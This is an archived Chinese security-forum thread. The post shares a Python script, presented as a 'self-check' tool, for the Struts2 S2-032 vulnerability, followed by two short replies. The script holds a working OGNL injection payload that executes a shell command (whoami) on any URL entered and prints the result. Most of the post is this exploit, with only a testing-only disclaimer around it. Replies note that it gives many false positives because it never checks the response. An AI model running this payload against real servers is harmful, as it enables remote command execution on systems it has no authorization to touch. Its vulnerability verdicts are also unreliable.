Select Browser Mobile | Continue

Silic Group Froum Archive - Silic Security

 Forgot Password?
 Join Us
Search
Show: 1179|Reply: 2

[脚本] 简易版S2-032自查脚本

[Copy URL]
cold The user has been deleted
Posted 2016-5-2 23:16:19 | Show all replies |Read Mode
今两天各大漏洞平台都被Struts2命令执行漏洞所刷屏了,网上有各种利用代码,看到他们的都很复杂,索性就写了一个Python脚本给各位测试吧!

本脚本仅用于安全测试,不得用于非法用途,否则自负!

  1. #! /usr/bin/env python
  2. # coding:utf-8

  3. ##############################################
  4. #
  5. # 简易版S2-032自查脚本 V1.0
  6. #
  7. # 20160428 V1.0
  8. #
  9. # By:EvillenG    QQ:2264672229
  10. #
  11. ##############################################

  12. import urllib
  13. import sys

  14. print
  15. print "简易版S2-032自查脚本 V1.0 By:EvillenG"
  16. print
  17. print "本脚本仅用于安全测试,不得用于非法用途,否则自负!"
  18. print

  19. def getHtml(url):
  20.     req = urllib.urlopen(url)
  21.     date = req.read()
  22.     print date


  23. def main():

  24.     try:
  25.         comm = raw_input("URL:")
  26.         get_exp = comm + "?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@[email protected]().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=\\A&ppp=%20&encoding=UTF-8"
  27.         targetHtml = getHtml(str(get_exp))

  28.         print targetHtml
  29.         print
  30.         print "此网站存在Struts2命令执行漏洞,请尽快打补丁,谢谢!"
  31.         print
  32.     except:
  33.         print
  34.         print "此网站不存在Struts2命令执行漏洞,请放心使用,谢谢!"
  35.         print


  36. if __name__=='__main__':

  37.     main()
Copy
10.png

oyeahtime The user has been deleted
Posted 2016-5-3 11:21:28 | Show all replies
误报比较严重啊
Evilys The user has been deleted
Posted 2016-5-4 19:19:00 | Show all replies
没有判断返回数据包
You need to login before reply! Login | Join Us

Credit Rules of This Forum

Close

公告Privious /1 Next

小黑屋|手机版|Archiver|Silic Security

GMT+8, 2019-12-9 11:23

© 2001-2014 Silic Corp.

Quick Reply Top Return List